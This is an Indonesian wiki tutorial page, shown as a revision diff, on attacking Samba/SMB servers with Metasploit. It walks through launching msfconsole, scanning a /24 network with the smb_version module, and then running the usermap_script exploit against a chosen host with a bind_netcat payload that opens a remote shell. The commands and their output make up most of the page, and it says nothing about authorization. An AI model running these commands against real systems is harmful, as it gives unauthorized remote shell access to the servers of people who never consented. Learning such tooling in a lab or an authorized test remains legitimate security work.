Difference between revisions of "Kali Linux: Membobol Network Neighbourhood / SAMBA"

From OnnoWiki
Jump to navigation Jump to search
Line 146: Line 146:
  
 
* http://www.elithecomputerguy.com/2013/01/22/hacking-samba-smb-servers-in-metasploit/
 
* http://www.elithecomputerguy.com/2013/01/22/hacking-samba-smb-servers-in-metasploit/
 +
* infosecninja.blogspot.co.id/2013/07/penetration-testing-samba-server.html

Revision as of 08:18, 15 February 2016

Sumber: http://www.elithecomputerguy.com/2013/01/22/hacking-samba-smb-servers-in-metasploit/



Jalankan msfconsole

Ketik di console

msfconsole

Akan keluar kira-kira

  Metasploit Park, System Security Interface
  Version 4.0.5, Alpha E
  Ready...
  > access security
  access: PERMISSION DENIED.
  > access security grid
  access: PERMISSION DENIED.
  > access main security grid
  access: PERMISSION DENIED....and...
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!


Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit 

       =[ metasploit v4.11.4-2015071403                   ]
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 


yang lebih sopan, KETIK

msfconsole thankyou

Akan keluar


     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     ||| 


Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit 

       =[ metasploit v4.11.4-2015071403                   ]
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

Lakukan enumerasi

KETIK

use auxiliary/scanner/smb/smb_version
show options

Keluar

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

KETIK

set RHOSTS 192.168.0.0/24
set THREADS 75
run

Hasilnya

[*] 192.168.0.7:445 could not be identified: Unix (Samba 3.6.3-31a.osstech)
[*] Scanned  44 of 256 hosts (17% complete)
[*] Scanned  68 of 256 hosts (26% complete)
[*] Scanned  78 of 256 hosts (30% complete)
[*] 192.168.0.90:445 is running Windows 7 Professional SP1 (build:7601) (name:HP-PC) (domain:WORKGROUP)
[*] Scanned 152 of 256 hosts (59% complete)
[*] Scanned 153 of 256 hosts (59% complete)
[*] 192.168.0.221:445 could not be identified: Unix (Samba 3.0.37)
[*] Scanned 156 of 256 hosts (60% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 227 of 256 hosts (88% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

exploit

KETIK

use exploit/multi/samba/usermap_script
show options

Keluar

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port
 

Exploit target:

   Id  Name
   --  ----
   0   Automatic


KETIK

set RHOST 192.168.0.7
set payload cmd/unix/bind_netcat
exploit


Jika sudah selesai

quit

Referensi